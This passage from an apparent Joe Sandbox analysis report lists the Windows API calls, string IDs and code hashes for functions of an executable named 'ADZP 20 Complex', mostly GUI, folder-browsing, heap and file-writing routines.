                    • SendMessageW.USER32(0000000C,00000000,00000000), ref: 00409186
                    • wcslen.MSVCRT ref: 00409189
                    • wcslen.MSVCRT ref: 00409191
                    • SendMessageW.USER32(000000B1,00000000,00000000), ref: 004091A3
                    • CreateWindowExW.USER32(00000000,BUTTON,00413080,50010001,0000006E,00000043,00000050,00000019,00000000,000003E8,00000000), ref: 004091CD
                    • SendMessageW.USER32(00000000,00000030,00000001), ref: 004091DF
                    • CreateAcceleratorTableW.USER32(?,00000002,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409216
                    • SetForegroundWindow.USER32(00000000), ref: 0040921F
                    • BringWindowToTop.USER32(00000000), ref: 00409226
                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00409239
                    • TranslateAcceleratorW.USER32(00000000,00000000,?), ref: 0040924A
                    • TranslateMessage.USER32(?), ref: 00409259
                    • DispatchMessageW.USER32(?), ref: 00409264
                    • DestroyAcceleratorTable.USER32(00000000), ref: 00409278
                    • wcslen.MSVCRT ref: 00409289
                    • wcscpy.MSVCRT ref: 004092A1
                    • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004092B4
                    Strings
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Window$Message$CreateSend$wcslen$Accelerator$HeapLoadMetricsSystemTableTranslatewcscpy$AllocBringClassCursorDestroyDispatchEnableEnabledFocusForegroundFreeIconLongObjectRegisterStock
                    • String ID: 0$BUTTON$D0A$EDIT$STATIC
                    • API String ID: 54849019-2968808370
                    • Opcode ID: a182f17251ce321d778d7634bfe8f157872b1c2c0697115c82c91e82e7d6380d
                    • Instruction ID: ac9e317f2143d035474ccc6d8eb2369134aae38ec411cec841dcb6eceac04435
                    • Opcode Fuzzy Hash: a182f17251ce321d778d7634bfe8f157872b1c2c0697115c82c91e82e7d6380d
                    • Instruction Fuzzy Hash: FC919071548300BFE7219F65DD49F9B7BE9EB48B50F00483EFA84A61E1CBB988408B5D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401511 Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 335fileCOMMON
                    Download Yara Rule
                    APIs
                    • WriteFile.KERNEL32(?,00000000,?,?,00000000,?), ref: 00401648
                      • Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
                      • Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
                      • Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B
                      • Part of subcall function 004057F0: wcsncmp.MSVCRT(00000000,?,?,?,?,-0000012C,?,?,00402252,00000000,00000002,00000000,00000000,00417024,00000001,00000000), ref: 00405853
                      • Part of subcall function 004057F0: memmove.MSVCRT ref: 004058E1
                      • Part of subcall function 004057F0: wcsncpy.MSVCRT ref: 004058F9
                      • Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
                      • Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(020A0000,00000000,?), ref: 0040E599
                      • Part of subcall function 0040E560: RtlReAllocateHeap.NTDLL(020A0000,00000000,?,?), ref: 0040E5BC
                      • Part of subcall function 0040AD45: wcsncpy.MSVCRT ref: 0040AD63
                      • Part of subcall function 0040AD45: wcslen.MSVCRT ref: 0040AD75
                      • Part of subcall function 0040AD45: CreateDirectoryW.KERNELBASE(?,00000000), ref: 0040ADB5
                      • Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7
                    Strings
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: AllocateErrorHeapLastValuewcslenwcsncpy$CreateDirectoryFileWritememmovewcsncmp
                    • String ID: $pA$&pA$.pA$2pA$2pA$2pA$6pA$6pA$6pA$\pA$\pA$\pA$\pA$\pA
                    • API String ID: 1295435411-2952853158
                    • Opcode ID: d64868e5c00eaaf1b55b8d26c688d327ecd9e6ef433e22dfa90474c3973bb521
                    • Instruction ID: 61c24dd49085b80bd1b70adcfbfbd818be60928fccba90bb55e88b0b877bbf77
                    • Opcode Fuzzy Hash: d64868e5c00eaaf1b55b8d26c688d327ecd9e6ef433e22dfa90474c3973bb521
                    • Instruction Fuzzy Hash: AEB11FB1104304BED600BB62DD8297F77A9EB88708F50CD3FB144A61E2EA3DDD55962E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00409355 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 116libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • CoInitialize.OLE32(00000000), ref: 00409373
                      • Part of subcall function 0040EA90: TlsGetValue.KERNEL32(0000000D,\\?\,?,004096ED,00000104,?,?,?,00401BD6,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 0040EA9A
                    • memset.MSVCRT ref: 00409381
                    • LoadLibraryW.KERNEL32(SHELL32.DLL,?,?,0000000A), ref: 0040938E
                    • GetProcAddress.KERNEL32(00000000,SHBrowseForFolderW), ref: 004093B0
                    • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDListW), ref: 004093BC
                    • wcsncpy.MSVCRT ref: 004093DD
                    • wcslen.MSVCRT ref: 004093F1
                    • CoTaskMemFree.OLE32(?), ref: 0040947A
                    • wcslen.MSVCRT ref: 00409481
                    • FreeLibrary.KERNEL32(00000000,00000000), ref: 004094A0
                    Strings
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: AddressFreeLibraryProcwcslen$InitializeLoadTaskValuememsetwcsncpy
                    • String ID: $0A$P$SHBrowseForFolderW$SHELL32.DLL$SHGetPathFromIDListW
                    • API String ID: 4193992262-92458654
                    • Opcode ID: 4992d49dd3de5c3f1859f7f66b903f930d521af3df3d93c459ab95a70e3c859f
                    • Instruction ID: dd14e0d5c7aaf6d086be5bb491997024bece532a8fadf3e5f1c49f9ab44bf52d
                    • Opcode Fuzzy Hash: 4992d49dd3de5c3f1859f7f66b903f930d521af3df3d93c459ab95a70e3c859f
                    • Instruction Fuzzy Hash: 43414471508304AAC720EF759C49A9FBBE8EF88714F004C3FF945E3292D77899458B5A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00406310 Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 275COMMON
                    Download Yara Rule
                    APIs
                    • wcsncpy.MSVCRT ref: 00406405
                      • Part of subcall function 0040E880: TlsGetValue.KERNEL32(0000000D,?,?,00405EC5,00001000,00001000,?,?,00001000,00402F92,00000000,00000008,00000001,00000000,00000000,00000000), ref: 0040E88A
                    • _wcsdup.MSVCRT ref: 0040644E
                    • _wcsdup.MSVCRT ref: 00406469
                    • _wcsdup.MSVCRT ref: 0040648C
                    • wcsncpy.MSVCRT ref: 00406578
                    • free.MSVCRT(?), ref: 004065DC
                    • free.MSVCRT(?), ref: 004065EF
                    • free.MSVCRT(?), ref: 00406602
                    • wcsncpy.MSVCRT ref: 0040662E
                    Strings
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: _wcsdupfreewcsncpy$Value
                    • String ID: $0A$$0A$$0A
                    • API String ID: 1554701960-360074770
                    • Opcode ID: 50c0b281b621336e4783d2df5908e4d1d9710958fa3a9793cbe9cd8f60bad7d8
                    • Instruction ID: 8dd6decbfdfb2e9f9ed0212bb19f765ed94392260ea2aa670051c2f9137328dc
                    • Opcode Fuzzy Hash: 50c0b281b621336e4783d2df5908e4d1d9710958fa3a9793cbe9cd8f60bad7d8
                    • Instruction Fuzzy Hash: 27A1BD715043019BCB209F18C881A2BB7F1EF94348F49493EFC8667391E77AD965CB9A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040AEBA Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 91libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040E900: TlsGetValue.KERNEL32(0000000D,00001000,00000000,00000000), ref: 0040E90C
                      • Part of subcall function 0040E900: RtlReAllocateHeap.NTDLL(020A0000,00000000,?,?), ref: 0040E967
                    • LoadLibraryW.KERNEL32(Shell32.DLL,00000104,?,?,?,?,00000009,0040373D,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0040AEE3
                    • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 0040AEF5
                    • wcscpy.MSVCRT ref: 0040AF1B
                    • wcscat.MSVCRT ref: 0040AF26
                    • wcslen.MSVCRT ref: 0040AF2C
                    • CoTaskMemFree.OLE32(?,00000000,00000000,?,020A9F70,00000000,00000000), ref: 0040AF3A
                    • FreeLibrary.KERNEL32(00000000,?,?,?,00000009,0040373D,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000,00404746,00000000), ref: 0040AF41
                    • wcscat.MSVCRT ref: 0040AF59
                    • wcslen.MSVCRT ref: 0040AF5F
                    Strings
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: FreeLibrarywcscatwcslen$AddressAllocateHeapLoadProcTaskValuewcscpy
                    • String ID: Downloads\$SHGetKnownFolderPath$Shell32.DLL
                    • API String ID: 1878685483-287042676
                    • Opcode ID: ad09f511d23b933faec5afe470d0aa094d12b013be087039f3c77e99aed8eb9a
                    • Instruction ID: 692465ff5638a5220195cb25a460cc83d5c0d74b8cd54d9d2378aa313f557f39
                    • Opcode Fuzzy Hash: ad09f511d23b933faec5afe470d0aa094d12b013be087039f3c77e99aed8eb9a
                    • Instruction Fuzzy Hash: 59210DB12483037AC121A7629C4AF6B3968DB51B95F10043FF505B51C1DABCC96195AF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00412722 Relevance: 19.6, APIs: 13, Instructions: 74memoryregistrythreadCOMMON
                    Download Yara Rule
                    APIs
                    • TlsAlloc.KERNEL32(?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000), ref: 00412732
                    • InitializeCriticalSection.KERNEL32(004186E8,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000), ref: 0041273E
                    • TlsGetValue.KERNEL32(?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000), ref: 00412754
                    • HeapAlloc.KERNEL32(00000008,00000014,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000), ref: 0041276E
                    • EnterCriticalSection.KERNEL32(004186E8,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000), ref: 0041277F
                    • LeaveCriticalSection.KERNEL32(004186E8,?,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000), ref: 0041279B
                    • GetCurrentProcess.KERNEL32(00000000,00100000,00000000,00000000,?,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000), ref: 004127B4
                    • GetCurrentThread.KERNEL32 ref: 004127B7
                    • GetCurrentProcess.KERNEL32(00000000,?,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000), ref: 004127BE
                    • DuplicateHandle.KERNEL32(00000000,?,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000), ref: 004127C1
                    • RegisterWaitForSingleObject.KERNEL32(0000000C,00000000,0041281A,00000000,000000FF,00000008), ref: 004127D7
                    • TlsSetValue.KERNEL32(00000000,?,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000), ref: 004127E4
                    • HeapAlloc.KERNEL32(00000000,0000000C,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000), ref: 004127F5
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: AllocCriticalCurrentSection$HeapProcessValue$DuplicateEnterHandleInitializeLeaveObjectRegisterSingleThreadWait
                    • String ID:
                    • API String ID: 298514914-0
                    • Opcode ID: 2e736260770be91d420535d1c957e5431970d5774848fb61a6feb3a44565c38a
                    • Instruction ID: 7332ff317071e0a972604479ba3dd7ff9d073507a24f1d64326450f2c9127e0c
                    • Opcode Fuzzy Hash: 2e736260770be91d420535d1c957e5431970d5774848fb61a6feb3a44565c38a
                    • Instruction Fuzzy Hash: 36210770644301BFDB119F60ED88B967FB9FB08761F14C43AF505A62A1CBB49850CB68
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403221 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 176COMMON
                    Download Yara Rule
                    APIs
                    • GetWindowsDirectoryW.KERNEL32(00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 004032AE
                    • PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 004032B7
                    • GetSystemDirectoryW.KERNEL32(00000000,00000800), ref: 004033D7
                    • PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000800,00000000,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 004033E0
                      • Part of subcall function 0040E560: RtlReAllocateHeap.NTDLL(020A0000,00000000,?,?), ref: 0040E5BC
                    • PathAddBackslashW.SHLWAPI(00000000,00000000,sysnative,00000000,00000000,00000000,00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 004032E7
                      • Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
                      • Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
                      • Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B
                      • Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
                      • Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(020A0000,00000000,?), ref: 0040E599
                    • GetSystemDirectoryW.KERNEL32(00000000,00000800), ref: 00403414
                    • PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 0040341D
                    Strings
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: BackslashPath$Directory$AllocateErrorHeapLastSystemValue$Windows
                    • String ID: sysnative
                    • API String ID: 3406704365-821172135
                    • Opcode ID: ffb34744e6d629d9349e21e7cca883396b6f40e9af2640bea7bdd6565dd5fdd2
                    • Instruction ID: e6855e8cc6b59ba75e59fbb34a632fbdfc5c60153de78cbca022c055a9fde60a
                    • Opcode Fuzzy Hash: ffb34744e6d629d9349e21e7cca883396b6f40e9af2640bea7bdd6565dd5fdd2
                    • Instruction Fuzzy Hash: 83510A75118201BAD600BBB3DC82E3F66A9EB8075CF10CC3EB144751E2EA3DD9655A6E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040E0C3 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 53librarysleeploaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryW.KERNEL32(Kernel32.dll,00000000,00000000,00000000,00000004,00000000,0040DED5,0041867C,0040E062,00000000,FFFFFFED,00000200,76EC5E70,0040A4F6,FFFFFFED,00000010), ref: 0040E0D1
                    • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 0040E0E6
                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040E101
                    • InterlockedCompareExchange.KERNEL32(00000000,00000001,00000000), ref: 0040E110
                    • Sleep.KERNEL32(00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040E122
                    • InterlockedExchange.KERNEL32(00000000,00000002), ref: 0040E135
                    Strings
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: ExchangeInterlockedLibrary$AddressCompareFreeLoadProcSleep
                    • String ID: InitOnceExecuteOnce$Kernel32.dll
                    • API String ID: 2918862794-1339284965
                    • Opcode ID: 5ce0d2485c1bb4decbbcb922162a80cd5c7d15fe9eeb9708d5254b12b909fa63
                    • Instruction ID: f1debd77009d833240bff916e076c3bff8506a5db62120b34ae0b3aef6ef2b9b
                    • Opcode Fuzzy Hash: 5ce0d2485c1bb4decbbcb922162a80cd5c7d15fe9eeb9708d5254b12b909fa63
                    • Instruction Fuzzy Hash: 3001D431244214FBD6201FA2DC4DFEB7B79EB45B52F10883AF501B51C0EAB85D21C66D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00409507 Relevance: 12.0, APIs: 8, Instructions: 50threadwindowCOMMON
                    Download Yara Rule
                    APIs
                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00409511
                    • GetCurrentThreadId.KERNEL32 ref: 0040951F
                    • IsWindowVisible.USER32(?), ref: 00409526
                      • Part of subcall function 0040E1F2: HeapAlloc.KERNEL32(00000008,00000000,0040DA6C,00418670,00000014,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000), ref: 0040E1FE
                    • GetCurrentThreadId.KERNEL32 ref: 00409543
                    • GetWindowLongW.USER32(?,000000EC), ref: 00409550
                    • GetForegroundWindow.USER32 ref: 0040955E
                    • IsWindowEnabled.USER32(?), ref: 00409569
                    • EnableWindow.USER32(?,00000000), ref: 00409579
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Window$Thread$Current$AllocEnableEnabledForegroundHeapLongProcessVisible
                    • String ID:
                    • API String ID: 3383493704-0
                    • Opcode ID: 68a633d90a34132dfb5e2fdbc66a21f5e6654eddc9afd13cb677bbd48b54e552
                    • Instruction ID: 39f81579f69f96c849a8792b8e2bccb0372a8aae8c011f207204c0ba92c0e649
                    • Opcode Fuzzy Hash: 68a633d90a34132dfb5e2fdbc66a21f5e6654eddc9afd13cb677bbd48b54e552
                    • Instruction Fuzzy Hash: 2E01DD321083016FD3219B7ADC88AABBBF8AF51760B04803EF446D3291D7748C40C66D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00408EB4 Relevance: 10.6, APIs: 7, Instructions: 54memoryCOMMON
                    Download Yara Rule
                    APIs
                    • DestroyWindow.USER32(?), ref: 00408EED
                    • GetWindowLongW.USER32(?,000000EB), ref: 00408EFC
                    • GetWindowTextLengthW.USER32 ref: 00408F0A
                    • HeapAlloc.KERNEL32(00000000), ref: 00408F1F
                    • GetWindowTextW.USER32(00000000,00000001), ref: 00408F2F
                    • DestroyWindow.USER32(?), ref: 00408F3D
                    • UnregisterClassW.USER32 ref: 00408F53
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Window$DestroyText$AllocClassHeapLengthLongUnregister
                    • String ID:
                    • API String ID: 2895088630-0
                    • Opcode ID: 95d800774705508cbc5b0801488b835211eb90fc9c6ab37156a63b4f6fedfd03
                    • Instruction ID: 1940c3daec6268f5e5453f2abd6c11195bb238337c9a47dace4bef07d760dbb1
                    • Opcode Fuzzy Hash: 95d800774705508cbc5b0801488b835211eb90fc9c6ab37156a63b4f6fedfd03
                    • Instruction Fuzzy Hash: 9011FA3110821AFFCB115F64ED4C9E63F76EB18365B10C17AF845A2AB0CF359951EB58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00409588 Relevance: 9.1, APIs: 6, Instructions: 68threadCOMMON
                    Download Yara Rule
                    APIs
                    • EnumWindows.USER32(00409507,?), ref: 0040959B
                    • GetCurrentThreadId.KERNEL32 ref: 004095B3
                    • SetWindowPos.USER32(?,000000FE,00000000,00000000,00000000,00000000,00000003,?,?,?,?,?), ref: 004095CF
                    • GetCurrentThreadId.KERNEL32 ref: 004095EF
                    • EnableWindow.USER32(?,00000001), ref: 00409605
                    • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003,?,?,?,?,?), ref: 0040961C
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Window$CurrentThread$EnableEnumWindows
                    • String ID:
                    • API String ID: 2527101397-0
                    • Opcode ID: 63874de7abb22210dce27e7498091370d04ccb8537cec92ca55daa4cf010ce04
                    • Instruction ID: 1b506e7c949c81e82e84a7d7bfb29e48a0d3001387cd43cbe5fa1ceb5ac7c4b4
                    • Opcode Fuzzy Hash: 63874de7abb22210dce27e7498091370d04ccb8537cec92ca55daa4cf010ce04
                    • Instruction Fuzzy Hash: D211D032149741BBD7324F16EC48F57BBB9EB81B20F148A3EF065226E1DB766C44CA18
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040D9D3 Relevance: 9.1, APIs: 6, Instructions: 66memoryCOMMON
                    Download Yara Rule
                    APIs
                    • TlsAlloc.KERNEL32(?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D9F8
                    • HeapAlloc.KERNEL32(00000008,00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040DA0C
                    • TlsSetValue.KERNEL32(00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040DA19
                    • TlsGetValue.KERNEL32(00000010,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040DA30
                    • HeapReAlloc.KERNEL32(00000008,00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040DA3F
                    • TlsSetValue.KERNEL32(00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040DA4E
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: AllocValue$Heap
                    • String ID:
                    • API String ID: 2472784365-0
                    • Opcode ID: 7f6b70932fc1a08cda45a5a13933a08f33854a1b42fa358b63a86d14e57a1294
